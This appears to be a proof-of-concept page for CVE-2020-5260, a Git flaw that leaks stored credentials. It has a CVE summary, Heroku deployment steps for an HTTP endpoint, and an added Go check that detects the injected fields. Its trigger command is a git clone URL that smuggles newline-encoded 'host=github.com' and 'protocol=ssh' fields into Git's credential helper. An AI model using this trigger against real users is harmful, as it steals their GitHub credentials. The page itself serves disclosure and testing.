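Related vulnerability
Title: Git input validation error vulnerability (CVE-2020-5260)
Description: Git is a free, open-source distributed version control system. Git contains an input validation error vulnerability. An attacker can exploit it with a specially crafted URL to obtain private credentials. The following products and versions are affected: Git 2.17.3 and earlier, 2.18.2 and earlier, 2.19.3 and earlier, 2.20.2 and earlier, 2.21.1 and earlier, 2.22.2 and earlier, 2.23.1 and earlier, 2.24.1 and earlier, 2.25.2 and earlier, and 2.26.0 and earlier.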
Description
An HTTP PoC Endpoint for cve-2020-5260 which can be deployed to Heroku
Introduction
# cve-2020-5260
An HTTP PoC Endpoint for cve-2020-5260 which can be deployed to Heroku
# CREDIT INFORMATION
Felix Wilhelm of Google Project Zero
https://bugs.chromium.org/p/project-zero/issues/detail?id=2021
# Trigger the vuln
```
git clone 'https://YourHerokuAppNameAndNotMine.herokuapp.com?%0ahost=github.com%0aprotocol=ssh'
```
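Why the `%0a` sequences in that URL matter, as an added example that is not part of the PoC repository: Git talks to credential helpers with newline-separated `key=value` lines, so a decoded line break inside a URL value turns the rest of the URL into extra fields, and patched Git versions refuse credential values that contain a newline. The helper name `InjectedFields` is hypothetical, and the sketch decodes everything after the scheme in one go rather than reproducing Git's own URL parser.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// ErrNewline marks a URL that breaks the helper protocol's one-field-per-line framing.
var ErrNewline = errors.New("decoded URL contains CR or LF")

// InjectedFields (hypothetical helper) percent-decodes everything after the
// scheme and returns the key=value lines that follow an embedded newline:
// the fields a line-oriented credential helper would read as separate input.
// Simplification: the whole remainder is decoded, not each URL component.
func InjectedFields(remote string) ([]string, error) {
	i := strings.Index(remote, "://")
	if i < 0 {
		return nil, fmt.Errorf("no scheme in %q", remote)
	}
	decoded, err := url.PathUnescape(remote[i+3:])
	if err != nil {
		return nil, fmt.Errorf("bad percent-encoding: %w", err)
	}
	if !strings.ContainsAny(decoded, "\r\n") {
		return nil, nil // no line break: framing stays intact
	}
	var fields []string
	for _, line := range strings.Split(decoded, "\n")[1:] {
		line = strings.TrimRight(line, "\r")
		if strings.Contains(line, "=") {
			fields = append(fields, line)
		}
	}
	return fields, ErrNewline
}

func main() {
	for _, u := range []string{
		// Trigger URL exactly as given on this page.
		"https://YourHerokuAppNameAndNotMine.herokuapp.com?%0ahost=github.com%0aprotocol=ssh",
		// Ordinary remote for comparison.
		"https://github.com/brompwnie/cve-2020-5260",
	} {
		fields, err := InjectedFields(u)
		fmt.Printf("%s\n  injected=%q err=%v\n", u, fields, err)
	}
}
```

A check like this fits tooling that accepts repository or submodule URLs from untrusted input; it complements, and does not replace, running a Git release newer than the affected versions listed above.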
# Get PoC onto Heroku
Click this button to automagically deploy to Heroku...
[Deploy to Heroku](https://heroku.com/deploy)
Or follow the steps below...
Yes, I understand the irony of having to run Git clone commands to set up this PoC....
### Install the Heroku CLI via https://devcenter.heroku.com/articles/heroku-cli
If you haven't already, log in to your Heroku account and follow the prompts to create a new SSH public key.
```
$ heroku login
```
### Clone the repository
Use Git to clone cve-2020-5260's source code to your local machine.
```
$ mkdir cve-2020-5260
$ cd cve-2020-5260
$ git init
$ heroku apps:create cve-2020-5260
$ git clone https://github.com/brompwnie/cve-2020-5260
```
### Deploy your changes
Make some changes to the code you just cloned and deploy them to Heroku using Git.
```
$ git add .
$ git commit -am "make it better"
$ git push heroku master
```
File snapshot
[4.0K] /data/pocs/a95325fa85df922d03c5b2791f72d07516596c2d
├── [ 267] app.json
├── [ 87] go.mod
├── [1.0K] LICENSE
├── [1.4K] main.go
├── [ 19] Procfile
└── [1.2K] README.md
0 directories, 6 files